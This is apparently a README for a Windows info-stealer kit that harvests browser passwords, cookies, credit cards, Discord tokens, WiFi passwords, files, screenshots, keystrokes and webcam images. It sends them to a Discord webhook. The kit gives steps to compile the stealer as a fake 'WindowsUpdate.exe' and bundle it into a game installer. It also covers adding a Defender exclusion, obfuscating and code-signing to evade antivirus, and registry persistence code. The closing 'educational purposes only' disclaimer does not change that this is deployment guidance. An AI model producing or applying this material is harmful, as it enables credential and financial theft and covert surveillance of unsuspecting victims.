- stealer.py - Main data stealing script (500+ lines)
- compile.py - Auto-compiler to create EXE
- requirements.txt - Python dependencies
- β Saved Passwords - All website logins
- β Cookies - Session tokens, auth cookies
- β Autofill Data - Names, addresses, emails
- β Credit Cards - Card numbers & expiry dates
- β Browsing History - Last 100 visited sites
- β Bookmarks - Saved bookmarks
- β Discord Tokens - All accounts (regular, PTB, Canary)
- β User IDs - Extracted from tokens
- β Multiple Sources - Desktop app + browser
- β IP Address - Public & local IPs
- β System Info - OS, RAM, CPU, disk usage
- β MAC Address - Hardware identifier
- β Network Interfaces - All network adapters
- β Running Processes - Active applications
- β WiFi Passwords - All saved networks
- β SSID Names - Network names
- β Desktop Files - .txt, .pdf, .doc, .png, .jpg
- β Documents Folder
- β Downloads Folder
- β File Metadata - Size, modified date
- β Screen Capture - Current screen state
# Step 1: Install Python dependencies
pip install pyinstaller pywin32 pycryptodome psutil pyautogui
# Step 2: Run auto-compiler
python compile.py
# Select option 3 (Full setup)This will create: dist/WindowsUpdate.exe
# Install requirements
pip install -r requirements.txt
# Compile to EXE
pyinstaller --onefile --noconsole --name=WindowsUpdate stealer.pypip install pywin32 pycryptodome psutil pyautogui
python stealer.pyAll stolen data is sent to Discord webhook in multiple embeds:
- System Information Embed - IP, OS, RAM, CPU, etc.
- Discord Tokens Embed - All found tokens
- Passwords Embed - Website credentials
- Credit Cards Embed - Card details
- Cookies Embed - Session cookies
- WiFi Passwords Embed - Network credentials
- Browser History Embed - Recent URLs
- Files Embed - Found documents
Edit stealer.py line 15:
WEBHOOK_URL = "YOUR_DISCORD_WEBHOOK_URL_HERE"WindowsUpdate.exe
ChromeUpdate.exe
SecurityPatch.exe
SystemOptimizer.exe# Create installer that includes your stealer
# User runs "game_installer.exe" which:
# 1. Installs the real game
# 2. Silently runs stealer in backgroundpyinstaller --icon=chrome.ico --noconsole stealer.pyAdd exclusion before running:
Add-MpPreference -ExclusionPath "C:\Users\<username>\Downloads"The script auto-creates temp directory and cleans up after
Runs once, sends data, and exits (no traces)
Add to stealer.py:
import winreg
def add_to_startup():
key = winreg.OpenKey(winreg.HKEY_CURRENT_USER,
r"Software\Microsoft\Windows\CurrentVersion\Run",
0, winreg.KEY_SET_VALUE)
winreg.SetValueEx(key, "WindowsUpdate", 0, winreg.REG_SZ, sys.executable)
winreg.CloseKey(key)from pynput import keyboard
def on_press(key):
# Log keystrokes
pass
listener = keyboard.Listener(on_press=on_press)
listener.start()import cv2
cam = cv2.VideoCapture(0)
ret, frame = cam.read()
cv2.imwrite('webcam.jpg', frame)- β Google Chrome
- β Microsoft Edge
- β Opera
- β Brave
- β Chromium-based browsers
pywin32- Windows API accesspycryptodome- Decrypt Chrome datapsutil- System informationpyautogui- Screenshots
This stealer only works on Windows (uses Win32 APIs)
THIS IS FOR EDUCATIONAL PURPOSES ONLY
Using this tool without explicit permission is:
- β Illegal in most countries
- β Violates Computer Fraud & Abuse Act (USA)
- β Violates GDPR (Europe)
- β Can result in criminal prosecution
- β Can result in civil lawsuits
β Testing your own computer β Penetration testing with written authorization β Security research in controlled environment β Educational demonstrations with dummy data
β Installing on someone else's computer β Distributing without disclosure β Using stolen data β Selling the tool β Harassment or blackmail
pip install --upgrade pywin32 pycryptodome psutil pyautoguiRun as Administrator or add exclusions to antivirus
- Check webhook URL is correct
- Ensure internet connection active
- Check Discord webhook limits (30 requests/minute)
- Use obfuscator: PyArmor
- Add legitimate icon and metadata
- Code sign the executable
- Added credit card extraction
- Added WiFi password stealing
- Added screenshot capture
- Added file search
- Improved Discord token extraction
- Better error handling
- Basic Chrome password extraction
- Discord token stealing
- System information collection
For educational questions only.
Remember: With great power comes great responsibility.
Use wisely. Use legally. Use ethically.